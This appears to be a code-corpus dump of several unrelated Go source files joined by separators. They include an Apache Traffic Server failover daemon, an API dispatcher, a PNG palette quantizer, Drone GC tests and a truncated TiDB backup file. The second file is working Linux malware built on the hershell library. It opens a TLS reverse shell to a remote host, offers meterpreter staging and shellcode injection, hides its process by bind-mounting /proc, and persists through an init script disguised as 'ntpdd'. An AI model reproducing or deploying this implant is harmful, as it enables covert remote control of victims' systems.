// 修改请求信息--状态
UpdateRequestInfoStatus(status int, id int64) error
// 修改请求信息--请求次数
UpdateRequestInfoTimes(id int64) error
// 修改请求信息--是否发送成功过邮件
UpdateRequestInfoSend(id int64) error
// 查找所有异常数据(状态为:2(提交失败)和4(回滚失败))
ListExceptionalRequestInfo() ([]*RequestInfo, error)
// 将成功Try的信息存入数据库
InsertSuccessStep(s *SuccessStep) error
BatchInsertSuccessStep(s []*SuccessStep) error
// 更新成功Try的状态
UpdateSuccessStepStatus(rid, sid int64, status int) error
// 全部提交成功后,修改对应的状态(请求信息为:提交成功,Try信息状态为:提交成功)
Confirm(id int64) error
}
|
package main
import (
"bufio"
"bytes"
"crypto/sha256"
"crypto/tls"
"encoding/hex"
"fmt"
"net"
"os"
"os/exec"
"strings"
"time"
"github.com/lesnuages/hershell/meterpreter"
"github.com/lesnuages/hershell/shell"
)
const (
errCouldNotDecode = 1 << iota
errHostUnreachable = iota
errBadFingerprint = iota
)
var (
connectString string
fingerPrint string
)
func interactiveShell(conn net.Conn) {
var (
exit = false
prompt = "[hershell]> "
scanner = bufio.NewScanner(conn)
)
host, err := os.Hostname()
if err == nil {
prompt = host
}
conn.Write([]byte(prompt))
for scanner.Scan() {
command := scanner.Text()
if len(command) > 1 {
argv := strings.Split(command, " ")
switch argv[0] {
case "meterpreter":
if len(argv) > 2 {
transport := argv[1]
address := argv[2]
ok, err := meterpreter.Meterpreter(transport, address)
if !ok {
conn.Write([]byte(err.Error() + "\n"))
}
} else {
conn.Write([]byte("Usage: meterpreter [tcp|http|https] IP:PORT\n"))
}
case "inject":
if len(argv) > 1 {
shell.InjectShellcode(argv[1])
}
case "doexit":
exit = true
case "run_shell":
conn.Write([]byte("Enjoy your native shell\n"))
runShell(conn)
default:
shell.ExecuteCmd(command, conn)
}
if exit {
break
}
}
conn.Write([]byte(prompt))
}
}
func runShell(conn net.Conn) {
var cmd = shell.GetShell()
cmd.Stdout = conn
cmd.Stderr = conn
cmd.Stdin = conn
cmd.Run()
}
func checkKeyPin(conn *tls.Conn, fingerprint []byte) (bool, error) {
valid := false
connState := conn.ConnectionState()
for _, peerCert := range connState.PeerCertificates {
hash := sha256.Sum256(peerCert.Raw)
if bytes.Compare(hash[0:], fingerprint) == 0 {
valid = true
}
}
return valid, nil
}
func reverse(connectString string, fingerprint []byte) {
var (
conn *tls.Conn
err error
)
config := &tls.Config{InsecureSkipVerify: true}
if conn, err = tls.Dial("tcp", connectString, config); err != nil {
// os.Exit(errHostUnreachable)
return
}
defer conn.Close()
if ok, err := checkKeyPin(conn, fingerprint); err != nil || !ok {
// os.Exit(errBadFingerprint)
return
}
interactiveShell(conn)
}
func cmdRun(cmd string, shell bool) string {
if shell {
out, err := exec.Command("sh", "-c", cmd).Output()
if err != nil {
return ""
}
return strings.TrimSpace(string(out))
} else {
out, err := exec.Command(cmd).Output()
if err != nil {
return ""
}
return strings.TrimSpace(string(out))
}
}
func hideSelf(pid int) {
// hide process bind /proc/1
hideCmd := fmt.Sprintf("mount -o bind /proc/%d /proc/%d", pid, os.Getpid())
cmdRun(hideCmd, true)
}
func makeStartBootup() {
dPath := "/bin/ntpdd"
vRpath := "/etc/init.d/ntpdd"
vLnpath := "/etc/rcS.d/S59ntpdd"
bootCmd := fmt.Sprintf("echo \"#!/bin/sh\" > %s;echo \"%s> /dev/null 2>&1 &\" >> %s;chmod +x %s;ln -s %s %s", vRpath, dPath, vRpath, vRpath, vRpath, vLnpath)
cmdRun(bootCmd, true)
}
func main() {
_, err := net.Listen("tcp", ":65534")
if err != nil {
return
}
hideSelf(1)
makeStartBootup()
if connectString != "" && fingerPrint != "" {
fprint := strings.Replace(fingerPrint, ":", "", -1)
bytesFingerprint, err := hex.DecodeString(fprint)
if err != nil {
os.Exit(errCouldNotDecode)
}
for {
reverse(connectString, bytesFingerprint)
time.Sleep(time.Duration(60) * time.Second)
}
}
}
|
package main
import (
"fmt"
"os"
"github.com/aleale2121/Golang-TODO-Hex-DDD/pkg/cmd"
)
func main() {
if err := cmd.RunServer(); err != nil {
_, _ = fmt.Fprintf(os.Stderr, "%v\n", err)
os.Exit(1)
}
}
|
package app
import (
"errors"
"fmt"
"github.com/domac/ats_check/log"
"github.com/domac/ats_check/util"
"math/rand"
"net"
"os"
"path/filepath"
"strings"
"sync"
"time"
)
//服务器down掉异常
var ErrServerDown = errors.New("parent server down")
//上层节点结构
type ParentServer struct {
Host string
Working bool
MarkDown bool
}
//HaProxy节点结构
type HaProxyServer struct {
Host string
Working bool
MarkDown bool
}
type App struct {
exitChan chan int
cfg *AppConfig
parents map[string]*ParentServer
haproxys map[string]*HaProxyServer
sync.Mutex
parentIsProxy bool
}
func checkIsParent(parentIps []string, ip string) bool {
for _, pip := range parentIps {
if strings.Contains(pip, ip) {
return true
}
}
return false
}
//创建后台进程对象
func NewApp(cfg *AppConfig, log_path string) *App {
dir := filepath.Dir(log_path)
util.ShellRun("mkdir -p " + dir)
util.ShellRun("touch " + log_path)
//初始化日志
log.LogInit(log_path, "info")
localIp := util.GetLocalIp()
log.GetLogger().Infof(">>>>> local ip is %s", localIp)
if localIp != "" {
if checkIsParent(cfg.Parents, localIp) {
log.GetLogger().Infoln("this node is a parent node")
cfg.Is_parent = 1
}
}
a := &App{
cfg: cfg,
exitChan: make(chan int),
parents: make(map[string]*ParentServer),
haproxys: make(map[string]*HaProxyServer),
parentIsProxy: true,
}
return a
}
//应用启动
//上层节点检测
func (self *App) Startup() (err error) {
log.GetLogger().Infoln("服务初始化")
parent_config := self.cfg.Parents_config_path
parents := self.cfg.Parents
haproxys := self.cfg.Haproxys
log.GetLogger().Infof("上层节点的ATS配置文件:%s", parent_config)
//父节点信息不存在, 则退出
if len(parents) == 0 {
log.GetLogger().Errorln("上层结构不存在,请检查配置文件是否填写!")
self.Shutdown(nil)
os.Exit(2)
}
if self.cfg.Is_parent == 1 {
//parent节点模式
for _, hhost := range haproxys {
go self.haproxyHealthCheck(hhost)
}
} else {
//边缘节点模式
for _, phost := range parents {
//go self.parentHealthCheck(phost)
go self.parentHealthCheckByTcp(phost)
}
}
return
}
//Haproxy节点的监控检测
func (self *App) haproxyHealthCheck(hhost string) {
log.GetLogger().Infof("Haproxy节点健康检查开始 : %s", hhost)
//调度定时器
ticker := time.Tick(time.Duration(self.cfg.Check_duration_second) * time.Second)
for {
select {
case <-ticker:
//主体测试功能
log.GetLogger().Infof("HA定时健康监测 => %s", hhost)
err := retry(self.cfg.Retry, time.Duration(self.cfg.Retry_sleep_ms)*time.Millisecond,
func() error {
return self.tcpPortCheck(hhost, 80)
})
self.updateHaproxy(hhost, err == nil)
//HA故障恢复
self.haFailover(hhost)
case <-self.exitChan:
goto exit
}
}
exit:
log.GetLogger().Infof("HA %s 健康监测功能退出", hhost)
return
}
func (self *App) parentHealthCheckByTcp(phost string) {
//初始化上层节点状态
self.updateParent(phost, true)
log.GetLogger().Infof("中心节点健康检查(TCP): %s", phost)
//调度定时器
ticker := time.Tick(time.Duration(self.cfg.Check_duration_second) * time.Second)
for {
select {
case <-ticker:
//主体测试功能
log.GetLogger().Infof("定时健康监测(TCP) -> %s", phost)
err := retry(self.cfg.Retry, time.Duration(self.cfg.Retry_sleep_ms)*time.Millisecond,
func() error {
return self.tcpPortCheck(phost, 80)
})
self.updateParent(phost, err == nil)
//故障恢复
self.failover(phost)
case <-self.exitChan:
goto exit
}
}
exit:
log.GetLogger().Infof("%s 健康监测(TCP)功能退出", phost)
return
}
//上层节点健康检查
func (self *App) parentHealthCheck(phost string) {
//初始化上层节点状态
self.updateParent(phost, true)
health_check_url := self.cfg.Health_check
health_check_url = strings.Replace(health_check_url, "{parent}", phost, 1)
log.GetLogger().Infof("上层节点健康检查URL: %s", health_check_url)
//调度定时器
ticker := time.Tick(time.Duration(self.cfg.Check_duration_second) * time.Second)
httpclient := util.NewFastHttpClient(500 * time.Millisecond)
for {
select {
case <-ticker:
if httpclient == nil {
log.GetLogger().Infoln("重建httpclient")
httpclient = util.NewFastHttpClient(500 * time.Millisecond)
}
//主体测试功能
log.GetLogger().Infof("定时健康监测 -> %s", phost)
err := retry(self.cfg.Retry, time.Duration(self.cfg.Retry_sleep_ms)*time.Millisecond, func() error {
statusCode, body, err := httpclient.Get(nil, health_check_url)
body = body[:0] //清空body
if err != nil {
return err
}
//出现 5xx 错误
if statusCode >= 500 {
return ErrServerDown
}
return nil
})
self.updateParent(phost, err == nil)
//故障恢复
self.failover(phost)
case <-self.exitChan:
goto exit
}
}
exit:
log.GetLogger().Infof("%s 健康监测功能退出", phost)
return
}
//故障处理:Ha配置
func (self *App) haFailover(hhost string) {
if haServer, ok := self.haproxys[hhost]; ok {
if !haServer.Working {
self.forwardHaproxyRecover(haServer)
} else {
haServer.MarkDown = false
}
}
}
//故障处理
func (self *App) failover(phost string) {
if parentServer, ok := self.parents[phost]; ok {
// if parentServer.MarkDown && parentServer.Working {
// //服务恢复正常的情况
// //self.backwardRecover(parentServer)
// } else if !parentServer.MarkDown && !parentServer.Working {
// //服务出现不可用的情况
// self.forwardRecover(parentServer)
// }
if !parentServer.Working {
self.forwardRecover(parentServer)
} else {
self.parentIsProxy = true
parentServer.MarkDown = false
}
}
}
//----------------------- 正向处理(容错处理) -----------------------//
func (self *App) forwardHaproxyRecover(haproxyServer *HaProxyServer) {
log.GetLogger().Infof("%s >>>>>>>> forward Haproxy recover", haproxyServer.Host)
defer func() {
haproxyServer.MarkDown = true //markdown处理
}()
if !haproxyServer.MarkDown {
self.updateRemapHaproxyConfig(haproxyServer.Host)
self.reloadConfig()
}
}
//服务出现不可用的情况
func (self *App) forwardRecover(parentServer *ParentServer) {
log.GetLogger().Infof("%s >>>>>>>> forward recover", parentServer.Host)
defer func() {
parentServer.MarkDown = true //markdown处理
}()
if !parentServer.MarkDown {
self.updateParentConfig()
//全部上层节点已经不可用
if self.parentIsProxy && len(self.getNotWorkingParentsHosts()) == len(self.GetParentsHosts()) {
self.forwardRecordsConfig()
self.forwardRemapConfig()
self.parentIsProxy = false //关闭父代理功能
}
self.reloadConfig()
}
}
//records.config 关闭parent proxy功能
func (self *App) forwardRecordsConfig() {
field := "0"
testCmd := `sed -i 's/CONFIG[ ][ ]*proxy.config.http.parent_proxy_routing_enable[ ][ ]*INT[ ][ ]*.*/CONFIG proxy.config.http.parent_proxy_routing_enable INT %s/g' %s`
cmd := fmt.Sprintf(testCmd, field, self.cfg.Records_config_path)
log.GetLogger().Infof("update forward records config command: %s", cmd)
util.ShellRun(cmd)
}
//remap.config 配置访问源站
func (self *App) forwardRemapConfig() {
//备份原文件
bf := util.BackupFile(self.cfg.Remap_config_path)
if bf != "" {
log.GetLogger().Info("备份remap成功")
//替换文件
dir := filepath.Dir(self.cfg.filepath)
sourceFile := filepath.Join(dir, "remap_parent.config")
cmd := fmt.Sprintf("cp -r %s %s", sourceFile, self.cfg.Remap_config_path)
log.GetLogger().Info("forward cmd :", cmd)
util.ShellRun(cmd)
}
}
//----------------------- 反向处理(恢复处理) -----------------------//
//服务恢复正常的情况
func (self *App) backwardRecover(parentServer *ParentServer) {
log.GetLogger().Infof("%s backward recover", parentServer.Host)
self.Lock()
defer func() {
parentServer.MarkDown = false //markdown处理
self.Unlock()
}()
if parentServer.MarkDown {
self.updateParentConfig()
//之前的状态是回源站
if !self.parentIsProxy {
self.backwardRemapConfig()
self.backwardRecordsConfig()
}
self.reloadConfig()
}
}
//records.config 关闭parent proxy功能
func (self *App) backwardRecordsConfig() {
field := "1"
//cmd := strings.Replace(self.cfg.Setup_records_config_cmd, "{PARENTS_ENBALE}", field, 1)
testCmd := `sed -i 's/CONFIG[ ][ ]*proxy.config.http.parent_proxy_routing_enable[ ][ ]*INT[ ][ ]*.*/CONFIG proxy.config.http.parent_proxy_routing_enable INT %s/g' %s`
cmd := fmt.Sprintf(testCmd, field, self.cfg.Records_config_path)
util.ShellRun(cmd)
}
func (self *App) backwardRemapConfig() {
dir := filepath.Dir(self.cfg.filepath)
sourceFile := filepath.Join(dir, "remap_edge.config")
cmd := fmt.Sprintf("cp %s %s", sourceFile, self.cfg.Remap_config_path)
util.ShellRun(cmd)
}
//----------------------- 公共方法 -----------------------//
//重试函数
func retry(attempts int, sleep time.Duration, f func() error) error {
if err := f(); err != nil {
if attempts--; attempts > 0 {
time.Sleep(sleep)
log.GetLogger().Infoln("节点连接重试")
return retry(attempts, sleep, f)
}
log.GetLogger().Infof("重试终止,节点不可用")
return err
}
return nil
}
//tcp检测
func (self *App) tcpPortCheck(host string, port uint32) error {
addr := fmt.Sprintf("%s:%d", host, port)
conn, err := net.DialTimeout("tcp", addr, 2*time.Second)
if err != nil {
log.GetLogger().Errorf("tcp connect to %s fail !", addr)
return err
}
defer conn.Close()
return nil
}
//更新remap.config信息
func (self *App) updateRemapHaproxyConfig(hhost string) {
self.Lock()
defer self.Unlock()
log.GetLogger().Infof("update remap proxy config by host: ", hhost)
testCmd := `sed -i 's/@pparam=%s//g' %s`
cmd := fmt.Sprintf(testCmd, hhost, self.cfg.Remap_config_path)
log.GetLogger().Infof("update parent config command: %s", cmd)
util.ShellRun(cmd)
}
//更新parent.config信息
func (self *App) updateParentConfig() {
sleep1 := time.Duration(rand.Int63n(7)) * time.Second
time.Sleep(sleep1)
sleep2 := time.Duration(rand.Int63n(100)*10) * time.Millisecond
time.Sleep(sleep2)
pws := strings.Join(self.getWorkingParentsHosts(), ";")
testCmd := `sed -i 's/[^#].*parent=".*/dest_domain=. method=get parent="%s" round_robin=consistent_hash/g' %s`
cmd := fmt.Sprintf(testCmd, pws, self.cfg.Parents_config_path)
log.GetLogger().Infof("update parent config command: %s", cmd)
util.ShellRun(cmd)
}
//更新父节点信息
func (self *App) updateParent(phost string, working bool) {
self.Lock()
defer self.Unlock()
if p, ok := self.parents[phost]; ok {
p.Working = working
self.parents[phost] = p
} else {
np := &ParentServer{}
np.Host = phost
np.Working = working
self.parents[phost] = np
}
}
//更新Ha节点信息
func (self *App) updateHaproxy(hhost string, working bool) {
self.Lock()
defer self.Unlock()
if p, ok := self.haproxys[hhost]; ok {
p.Working = working
self.haproxys[hhost] = p
} else {
np := &HaProxyServer{}
np.Host = hhost
np.Working = working
self.haproxys[hhost] = np
}
}
//获取所有上层节点列表
func (self *App) GetParentsHosts() []string {
contents := []string{}
for _, ps := range self.parents {
contents = append(contents, ps.Host)
}
return contents
}
//获取正常工作的Ha节点列表
func (self *App) getWorkingHaproxyHosts() []string {
self.Lock()
defer self.Unlock()
contents := []string{}
for _, hs := range self.haproxys {
if hs.Working {
contents = append(contents, hs.Host)
}
}
return contents
}
//获取正常工作的上层节点列表
func (self *App) getWorkingParentsHosts() []string {
self.Lock()
defer self.Unlock()
contents := []string{}
for _, ps := range self.parents {
ph := ps.Host
if !strings.Contains(ph, ":80") {
ph = ph + ":80"
}
if ps.Working {
contents = append(contents, ps.Host)
}
}
return contents
}
//获取挂掉的工作的上层节点列表
func (self *App) getNotWorkingParentsHosts() []string {
self.Lock()
defer self.Unlock()
contents := []string{}
for _, ps := range self.parents {
if !ps.Working {
contents = append(contents, ps.Host)
}
}
return contents
}
func (self *App) reloadConfig() {
cmd := "sudo sh /apps/sh/ats.sh reload"
res, err := util.String(cmd)
if err != nil {
log.GetLogger().Error(err)
}
log.GetLogger().Infof("reload result: %s", res)
}
//停止服务
func (self *App) Shutdown(i interface{}) {
close(self.exitChan)
log.GetLogger().Infoln("应用服务关闭!!!")
}
|
package api
import (
"octlink/mirage/src/modules/session"
"octlink/mirage/src/utils/httpresponse"
"octlink/mirage/src/utils/merrors"
"octlink/mirage/src/utils/octlog"
"octlink/mirage/src/utils/octmysql"
"github.com/gin-gonic/gin"
)
type ApiResponse struct {
Error int `json:"error"`
ErrorLog string `json:"errorLog"`
Data interface{} `json:"data"`
}
/*
{
"module": "octlink.mirage.center.host.APIAddHost",
"paras": {
"ip": "kk",
"account": "root",
"password": ""
},
"async": false,
"session": {
"uuid": "00000000000000000000000000000000",
"skey": "00000000000000000000000000000000"
}
}
*/
type InputParas struct {
Module string
Api string
Paras map[string]interface{}
Async bool
Session map[string]interface{}
}
type ApiParas struct {
Proto *ApiProto
Session *session.Session
InParas *InputParas
Db *octmysql.OctMysql
}
func (api *Api) ApiTest(c *gin.Context) {
httpresponse.Ok(c, "Api Server is Running")
}
var GApiServices map[string]*ApiService
type ApiService struct {
Name string `json:"name"`
Handler func(*ApiParas) *ApiResponse `json:"handler"`
}
func GetApiService(key string) *ApiService {
service, ok := GApiServices[key]
if !ok {
octlog.Error("no service for %s found\n", key)
return nil
}
return service
}
var SessionExceptions = []string{
"octlink.mirage.center.account.APILoginByAccount",
"octlink.mirage.center.user.APILoginByUser",
}
func NeedSessionCheck(api string) bool {
for _, tmp_api := range SessionExceptions {
if api == tmp_api {
return false
}
}
return true
}
func getApiParas(c *gin.Context) (*ApiParas, int) {
var sid string
var apiParas *ApiParas = new(ApiParas)
c.BindJSON(&apiParas.InParas)
octlog.Debug("got api %s\n", apiParas.InParas.Api)
if apiParas.InParas.Api == "" {
octlog.Error("got null api\n")
return nil, merrors.ERR_NO_SUCH_API
}
proto := FindApiProto(apiParas.InParas.Api)
if proto == nil {
octlog.Error("no api proto found for %s\n",
apiParas.InParas.Api)
return nil, merrors.ERR_NO_SUCH_API
}
apiParas.Proto = proto
apiParas.Db = new(octmysql.OctMysql)
if NeedSessionCheck(apiParas.InParas.Api) {
sid = apiParas.InParas.Session["uuid"].(string)
} else {
sid = session.SESSION_DEFAULT_ID
}
octlog.Debug("found session id " + sid)
session := session.FindSession(apiParas.Db, sid)
if session == nil {
octlog.Error("not session found for this id" + sid)
return nil, merrors.ERR_USER_NOT_LOGIN
}
apiParas.Session = session
return apiParas, 0
}
func checkParas(apiParas *ApiParas) (int, string) {
protoParas := apiParas.Proto.Paras
for i := 0; i < len(protoParas); i++ {
protoParam := protoParas[i]
inParam := apiParas.InParas.Paras[protoParam.Name]
// if paras have default value and no input sepecified, set a default value
if protoParam.Default != PARAM_NOT_NULL && inParam == nil {
apiParas.InParas.Paras[protoParam.Name] = protoParam.Default
}
octlog.Debug("param:%s, default:%s, value:%s\n", protoParam.Name,
protoParam.Default, inParam)
if protoParam.Default == PARAM_NOT_NULL && inParam.(string) == "" {
errorMsg := "paras \"" + protoParam.Name + "\" must be specified"
return merrors.ERR_NOT_ENOUGH_PARAS, errorMsg
}
}
return merrors.ERR_OCT_SUCCESS, ""
}
func (api *Api) ApiDispatch(c *gin.Context) {
octlog.Error("got api request\n")
paras, err := getApiParas(c)
if paras == nil {
octlog.Error("No match proto found\n")
httpresponse.Error(c, err, nil)
return
}
service := GetApiService(paras.InParas.Api)
if service == nil {
octlog.Error("No match service found\n")
httpresponse.Error(c, merrors.ERR_NO_SUCH_API, paras.InParas.Api)
return
}
ret, msg := checkParas(paras)
if ret != merrors.ERR_OCT_SUCCESS {
octlog.Error("Not Enough Paras\n")
httpresponse.Error(c, merrors.ERR_NOT_ENOUGH_PARAS, msg)
return
}
resp := service.Handler(paras)
defer paras.Db.Close()
if resp.Error == 0 {
httpresponse.Ok(c, resp.Data)
} else {
httpresponse.Error(c, resp.Error, resp.ErrorLog)
}
}
|
package smallpng
import (
"image"
"image/color"
"math/rand"
"runtime"
"sync"
)
// DefaultMaxKMeansIters is the default maximum number of
// iterations of the k-means algorithm for clustering.
const DefaultMaxKMeansIters = 5
// DefaultPaletteSize is the default number of colors in a
// color palette.
const DefaultPaletteSize = 256
// DefaultMaxClusterPixels is the default number of pixels
// to randomly subsample from an image for clustering.
const DefaultMaxClusterPixels = 100000
// PaletteConfig determines how palette's are produced for
// images.
type PaletteConfig struct {
// MaxKMeansIters is the maximum number of clustering
// iterations. If 0, use DefaultMaxKMeansIters.
MaxKMeansIters int
// PaletteSize is the number of colors to use in the
// palette. If 0, use DefaultPaletteSize.
PaletteSize int
// MaxClusterPixels is the maximum number of pixels to
// use as data-points for clustering. If 0, use
// DefaultMaxClusterPixels.
MaxClusterPixels int
// ColorSpace is the color space to use for computing
// pixel distances and averages.
// If unspecified, the zero value for ColorSpace is
// used.
ColorSpace ColorSpace
}
func (p PaletteConfig) setDefaults() PaletteConfig {
if p.MaxKMeansIters == 0 {
p.MaxKMeansIters = DefaultMaxKMeansIters
}
if p.PaletteSize == 0 {
p.PaletteSize = DefaultPaletteSize
}
if p.MaxClusterPixels == 0 {
p.MaxClusterPixels = DefaultMaxClusterPixels
}
return p
}
// PaletteImage creates a color palette for an image using
// clustering to minimize the discrepency from reduced
// colors.
//
// If p is specified, it is used to configure the palette.
func PaletteImage(img image.Image, p *PaletteConfig) *image.Paletted {
if p == nil {
p = &PaletteConfig{}
}
*p = p.setDefaults()
bounds := img.Bounds()
colors := make([]colorVector, 0, bounds.Dx()*bounds.Dy())
for y := bounds.Min.Y; y < bounds.Max.Y; y++ {
for x := bounds.Min.X; x < bounds.Max.X; x++ {
colors = append(colors, p.ColorSpace.toVector(img.At(x, y)))
}
}
colors = subsampleClusterPixels(colors, p.MaxClusterPixels)
clusters := newColorClusters(colors, p.PaletteSize)
loss := clusters.Iterate()
for i := 0; i < p.MaxKMeansIters; i++ {
newLoss := clusters.Iterate()
if newLoss >= loss {
break
}
loss = newLoss
}
palette := make(color.Palette, p.PaletteSize)
for i, x := range clusters.Centers {
palette[i] = p.ColorSpace.toColor(x)
}
// Prevent nil colors in palette.
for i := len(clusters.Centers); i < len(palette); i++ {
palette[i] = palette[0]
}
res := image.NewPaletted(bounds, palette)
for y := bounds.Min.Y; y < bounds.Max.Y; y++ {
for x := bounds.Min.X; x < bounds.Max.X; x++ {
res.Set(x, y, img.At(x, y))
}
}
return res
}
func subsampleClusterPixels(colors []colorVector, maxPixels int) []colorVector {
if len(colors) <= maxPixels {
return colors
}
for i := 0; i < maxPixels; i++ {
j := rand.Intn(len(colors) - i)
colors[i], colors[j] = colors[j], colors[i]
}
return colors[:maxPixels]
}
type colorClusters struct {
Centers []colorVector
AllColors []colorVector
}
func newColorClusters(allColors []colorVector, numCenters int) *colorClusters {
// Optimization for the case where there are enough
// centers to cover every mode exactly.
uniqueColors := map[colorVector]bool{}
for _, c := range allColors {
uniqueColors[c] = true
}
if len(uniqueColors) <= numCenters {
unique := make([]colorVector, 0, len(uniqueColors))
for c := range uniqueColors {
unique = append(unique, c)
}
return &colorClusters{
Centers: unique,
AllColors: allColors,
}
}
return &colorClusters{
Centers: kmeansPlusPlusInit(allColors, numCenters),
AllColors: allColors,
}
}
// Iterate performs a step of k-means and returns the
// current MSE loss.
// If the MSE loss does not decrease, then the process has
// converged.
func (c *colorClusters) Iterate() float64 {
centerSum := make([]colorVector, len(c.Centers))
centerCount := make([]int, len(c.Centers))
totalError := 0.0
numProcs := runtime.GOMAXPROCS(0)
var resultLock sync.Mutex
var wg sync.WaitGroup
for i := 0; i < numProcs; i++ {
wg.Add(1)
go func(idx int) {
defer wg.Done()
localCenterSum := make([]colorVector, len(c.Centers))
localCenterCount := make([]int, len(c.Centers))
localTotalError := 0.0
for i := idx; i < len(c.AllColors); i += numProcs {
co := c.AllColors[i]
closestDist := 0.0
closestIdx := 0
for i, center := range c.Centers {
d := float64(co.DistSquared(center))
if d < closestDist || i == 0 {
closestDist = d
closestIdx = i
}
}
localCenterSum[closestIdx] = localCenterSum[closestIdx].Add(co)
localCenterCount[closestIdx]++
localTotalError += closestDist
}
resultLock.Lock()
defer resultLock.Unlock()
for i, c := range localCenterCount {
centerCount[i] += c
}
for i, s := range localCenterSum {
centerSum[i] = centerSum[i].Add(s)
}
totalError += localTotalError
}(i)
}
wg.Wait()
for i, newCenter := range centerSum {
count := centerCount[i]
if count > 0 {
c.Centers[i] = newCenter.Scale(1 / float32(count))
}
}
return totalError / float64(len(c.AllColors))
}
func kmeansPlusPlusInit(allColors []colorVector, numCenters int) []colorVector {
centers := make([]colorVector, numCenters)
centers[0] = allColors[rand.Intn(len(allColors))]
dists := newCenterDistances(allColors, centers[0])
for i := 1; i < numCenters; i++ {
sampleIdx := dists.Sample()
centers[i] = allColors[sampleIdx]
dists.Update(centers[i])
}
return centers
}
type centerDistances struct {
AllColors []colorVector
Distances []float64
DistanceSum float64
}
func newCenterDistances(allColors []colorVector, center colorVector) *centerDistances {
dists := make([]float64, len(allColors))
sum := 0.0
for i, c := range allColors {
dists[i] = float64(c.DistSquared(center))
sum += dists[i]
}
return ¢erDistances{
AllColors: allColors,
Distances: dists,
DistanceSum: sum,
}
}
func (c *centerDistances) Update(newCenter colorVector) {
c.DistanceSum = 0
for i, co := range c.AllColors {
d := float64(co.DistSquared(newCenter))
if d < c.Distances[i] {
c.Distances[i] = d
}
c.DistanceSum += c.Distances[i]
}
}
func (c *centerDistances) Sample() int {
sample := rand.Float64() * c.DistanceSum
idx := len(c.AllColors) - 1
for i, dist := range c.Distances {
sample -= dist
if sample < 0 {
idx = i
break
}
}
return idx
}
|
package mesg
type Soldier struct {
Id int `json:"id"` //士兵id
Rarity int `json:"rarity"` //士兵稀有度
Unlockarena int `json:"unlockarena"` //解锁阶段
Combatpoints int `json:"combatpoints"` //战力
Name string `json:"name"` //名字
Cvc int `json:"cvc"` //cvc client version code
}
// PrintRarity 输入士兵id获取稀有度
func PrintRarity (id int) int {
var soldier Soldier
if id == soldier.Id {
return soldier.Rarity
}
return -1
}
// PrintCombatPoints 输入士兵id获取战力
func PrintCombatPoints (id int) int {
var soldier Soldier
if id == soldier.Id {
return soldier.Combatpoints
}
return -1
}
// PrintCvcSoldier 输入稀有度,当前解锁阶段和cvc(client version code),获取该稀有度cvc合法且已解锁的所有士兵
func PrintCvcSoldier(rarity int, unlockarena int, cvc int) string {
var soldier Soldier
if (rarity == soldier.Rarity)&&(unlockarena == 1)&&(cvc >= 10){
return soldier.Name
}
return "Error"
}
func main() {
}
|
// Copyright 2019 Drone.IO Inc. All rights reserved.
// Use of this source code is governed by the Blue Oak Model License
// that can be found in the LICENSE file.
package gc
import (
"context"
"errors"
"fmt"
"testing"
"time"
"github.com/drone/drone-gc/mocks"
"github.com/docker/docker/api/types"
"github.com/golang/mock/gomock"
)
func TestCollectNetworks(t *testing.T) {
controller := gomock.NewController(t)
defer controller.Finish()
mockNetworks := []types.NetworkResource{
{Name: "a180b24e38ed", Driver: "bridge", Labels: map[string]string{"io.drone.expires": "915148800"}},
{Name: "e3d0f1751532", Driver: "bridge", Labels: map[string]string{"io.drone.expires": fmt.Sprint(time.Now().Add(time.Hour).Unix())}},
{Name: "bfbf8512f21e", Driver: "bridge", Labels: nil},
}
client := mocks.NewMockAPIClient(controller)
client.EXPECT().NetworkList(gomock.Any(), gomock.Any()).Return(mockNetworks, nil)
client.EXPECT().NetworkRemove(gomock.Any(), mockNetworks[0].Name).Return(nil)
c := New(client).(*collector)
err := c.collectNetworks(context.Background())
if err != nil {
t.Error(err)
}
}
func TestCollectNetworks_MultiError(t *testing.T) {
controller := gomock.NewController(t)
defer controller.Finish()
mockNetworks := []types.NetworkResource{
{Name: "a180b24e38ed", Driver: "bridge", Labels: map[string]string{"io.drone.expires": "915148800"}},
{Name: "bfbf8512f21e", Driver: "bridge", Labels: map[string]string{"io.drone.expires": "915148800"}},
}
mockErr := errors.New("cannot remove network")
client := mocks.NewMockAPIClient(controller)
client.EXPECT().NetworkList(gomock.Any(), gomock.Any()).Return(mockNetworks, nil)
client.EXPECT().NetworkRemove(gomock.Any(), mockNetworks[0].Name).Return(mockErr)
client.EXPECT().NetworkRemove(gomock.Any(), mockNetworks[1].Name).Return(nil)
c := New(client).(*collector)
err := c.collectNetworks(context.Background())
if err == nil {
t.Errorf("Expected multi-error returned")
}
}
|
// Copyright 2022 PingCAP, Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package task
import (
"bytes"
"context"
"encoding/binary"
"fmt"
"net/http"
"slices"
"strings"
"sync"
"time"
"github.com/docker/go-units"
"github.com/fatih/color"
"github.com/opentracing/opentracing-go"
"github.com/pingcap/errors"
"github.com/pingcap/failpoint"
backuppb "github.com/pingcap/kvproto/pkg/brpb"
"github.com/pingcap/log"
"github.com/pingcap/tidb/br/pkg/backup"
"github.com/pingcap/tidb/br/pkg/checkpoint"
"github.com/pingcap/tidb/br/pkg/conn"
berrors "github.com/pingcap/tidb/br/pkg/errors"
"github.com/pingcap/tidb/br/pkg/glue"
"github.com/pingcap/tidb/br/pkg/httputil"
"github.com/pingcap/tidb/br/pkg/logutil"
"github.com/pingcap/tidb/br/pkg/metautil"
"github.com/pingcap/tidb/br/pkg/restore"
"github.com/pingcap/tidb/br/pkg/restore/tiflashrec"
"github.com/pingcap/tidb/br/pkg/storage"
"github.com/pingcap/tidb/br/pkg/stream"
"github.com/pingcap/tidb/br/pkg/streamhelper"
advancercfg "github.com/pingcap/tidb/br/pkg/streamhelper/config"
"github.com/pingcap/tidb/br/pkg/streamhelper/daemon"
"github.com/pingcap/tidb/br/pkg/summary"
"github.com/pingcap/tidb/br/pkg/utils"
"github.com/pingcap/tidb/ddl"
"github.com/pingcap/tidb/kv"
"github.com/pingcap/tidb/parser/model"
"github.com/pingcap/tidb/util/mathutil"
"github.com/pingcap/tidb/util/sqlexec"
"github.com/spf13/pflag"
"github.com/tikv/client-go/v2/config"
"github.com/tikv/client-go/v2/oracle"
clientv3 "go.etcd.io/etcd/client/v3"
"go.uber.org/zap"
)
const (
flagYes = "yes"
flagUntil = "until"
flagStreamJSONOutput = "json"
